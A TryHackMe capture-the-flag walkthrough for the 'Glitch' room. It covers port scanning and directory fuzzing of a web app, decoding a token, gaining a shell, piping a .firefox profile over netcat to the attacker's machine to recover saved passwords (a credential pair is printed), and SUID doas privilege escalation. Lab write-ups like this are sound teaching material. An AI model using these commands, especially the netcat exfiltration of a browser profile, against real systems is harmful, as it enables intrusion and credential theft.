GLITCH

Challenge showcasing a web app and simple privilege escalation. Can you find the glitch?

Lab Setup

mkdir ~/Documents/tryhackme/glitch
cd ~/Documents/tryhackme/glitch
mkdir recon enumeration notes
touch notes/{README.md,vuln,creds}

export IP=10.10.29.23

Enumeration

First scan the machine for open ports. Scan the machine for open ports using RustScan. It's faster than Nmap, so I prefer using it exclusively for now.

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -A -T4 -oN recon/rustscan.init

Looks like only the HTTP port is open. Let's open it in the browser and see what's there. Nothing interesting, so I run feroxbuster to fuzz files and directories. I also run a nikto command in background, because it will take a while.

nikto --host $URL -C all -o enumeration/nikto.txt
feroxbuster -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/common.txt -o enumeration/feroxbuster

Discovered an interesting path: /api/acces.When I access it I found a token with base64 encoded value.

echo 'dGhpc19pc19ub3RfcmVhbA=='| base64 -d

Replace the token with the discovered value. Let's proceed to fuzz once more with the cookie configured accordingly.

feroxbuster -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://$IP -b 'token=this_is_not_real'

After conducting another round of fuzzing for files and directories, I examine the JavaScript code located at /js/script.js.

Get another path interesting /api/items. After a while I get something in response by changing the request method.

At this stage, I encountered a temporary impasse. After a while I proceeded to fuzz for parameters and responses with a 500 status code.

Now all I need to do is to get a reverse shell.

We get a shell as user, and in home directory we found user.txt flag. In same directory I found .firefox directory and again I was stuck for a while.

Privilege Escalation

Transfer directory in my machine and analyze it.

tar czf - .firefox | nc $my_IP 4747 
nc -lnvp 4747 | tar xvfz - 

mv .firefox firefox

This take me a lot, but finally I get the answer by open firefox and search for saved passwords.

v0id:love_the_void

During the penetration test, specific steps are followed for privilege escalation. After some time, I discovered that the "doas" file possesses the SUID bit set. Change the user to v0id and run doas.

find / -type f -perm -u=s 2>/dev/null

PreviousJasonNextVulnNet: Node

Last updated